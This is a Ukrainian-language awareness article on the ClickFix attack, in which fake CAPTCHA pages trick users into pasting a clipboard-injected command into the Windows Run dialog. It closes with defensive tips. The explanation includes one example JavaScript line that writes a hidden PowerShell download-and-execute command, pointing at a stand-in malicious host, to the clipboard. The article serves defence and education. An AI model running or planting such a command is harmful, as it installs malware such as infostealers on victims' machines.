Увага
Цей матеріал створено виключно в освітніх цілях та для підвищення обізнаності щодо кіберзагроз. Розуміння методів атаки — найкращий спосіб захисту.
Усі ми звикли до звичайних капч (як от Cloudflare, що був показаний в нашому відео) — того самого віконця «Verify you are human» (Підтвердіть, що ви людина). Це викликає довіру: ми ставимо галочку і чекаємо на завантаження сторінки. Але що, якщо замість успішної перевірки ви побачите помилку і прохання натиснути комбінацію клавіш? Знайомтеся, це ClickFix — один із найнебезпечніших методів соціальної інженерії сьогодення.
Зловмисники створюють ідеальну копію сторінки захисту капчі (або видуману сторінку Google зі вспливаючим вікном і т.д.) і розміщують її на зламаних або фішингових сайтах.
Процес виглядає так:
- Користувач заходить на сайт і бачить стандартне вікно верифікації.
- Він натискає на checkbox «Verify you are human».
- Раптом з'являється червоне повідомлення про помилку: «Verification failed. Manual verification required» (Помилка верифікації. Потрібна ручна перевірка).
- Сайт видає покрокову інструкцію: натисніть Win + R, потім Ctrl + V, а потім Enter.
Людина, яка поспішає отримати доступ до сайту, механічно виконує ці дії. Але натиснувши Enter, вона щойно власноруч запустила бекдор у своїй системі.
Магія цієї атаки ховається у буфері обміну (Clipboard). Коли користувач натискає на першу кнопку (нібито проходячи капчу), JavaScript-код сторінки непомітно копіює шкідливий скрипт у буфер обміну комп'ютера. Зазвичай для цього використовується стандартне API браузера:
javascriptnavigator.clipboard.writeText('powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr http://malicious-server.com/payload.exe -OutFile $env:TEMP\\payload.exe; Start-Process $env:TEMP\\payload.exe"');Далі соціальна інженерія робить свою справу:
В нас такого багато!
Перейти- Win + R: Відкриває системну утиліту «Виконати» (Run), яка дозволяє запускати команди напряму в Windows.
- Ctrl + V: Вставляє скопійований раніше шкідливий PowerShell-код у вікно «Виконати».
- Enter: Запускає код на виконання (завантаження вірусу з сервера зловмисника та його тихий запуск).
Головна проблема для безпеки полягає в тому, що шкідливий код не виконується в браузері. Сучасні браузери мають надійні «пісочниці» (sandbox), які не дозволяють сайтам напряму взаємодіяти з системою. Але у випадку з ClickFix браузер взагалі нічого не порушує: він просто скопіював текст. Користувач сам відкриває системну консоль і сам дає команду на завантаження та запуск вірусу (зазвичай це Infostealer для крадіжки паролів та сесій Telegram/Discord, або навіть шифрувальник-вимагач).
- Ніколи не використовуйте комбінацію Win + R для верифікації на сайтах. Жоден легітимний сервіс у світі не вимагає доступу до системної консолі для підтвердження того, що ви людина чи для оновлення браузера.
- Звертайте увагу на буфер обміну. Якщо сайт раптом просить вас вставити щось невідоме за межами звичайного текстового поля — це 100% спроба зараження. В Windows 10/11 можна натиснути
Win + V, щоб побачити історію буфера обміну. - Очищення буфера. Якщо ви випадково скопіювали щось підозріле на сумнівному сайті, просто виділіть і скопіюйте будь-які інші безпечні тексти (наприклад, слово з цієї статті), щоб затерти вірусний скрипт у пам'яті.



